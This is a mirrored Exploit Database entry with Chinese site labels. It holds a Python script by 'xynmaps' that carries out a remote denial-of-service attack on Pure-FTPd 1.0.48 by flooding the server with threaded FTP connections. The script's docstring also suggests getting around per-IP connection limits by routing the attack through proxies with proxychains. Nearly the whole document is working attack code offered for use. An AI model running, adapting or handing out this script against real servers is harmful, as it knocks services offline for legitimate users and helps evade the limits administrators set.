Pure-FTPd 1.0.48 – Remote Denial of Service

• Exploit Database
• 148 阅读

• 作者： xynmaps
  日期： 2020-11-26
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49105/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100

  # Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service # Date: 2020. nov. 26., 09:32:17 CET # Exploit Author: xynmaps # Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ # Software Link: https://github.com/jedisct1/pure-ftpd/ # Version: 1.0.48 # Tested on: Parrot Security OS 5.9.0   #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3. """ Pure-FTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn&apos;t limited. (if it&apos;s limited, just run this script from different proxies using proxychains, and it will work) """   import socket import sys import threading import subprocess import time   banner = """ ._________________. |Pure-FTPd| |D o S| |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_|   """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])   def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop()   t = threading.Thread(target=loop, args=(target, port, conns,)) t.start()   def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break   main()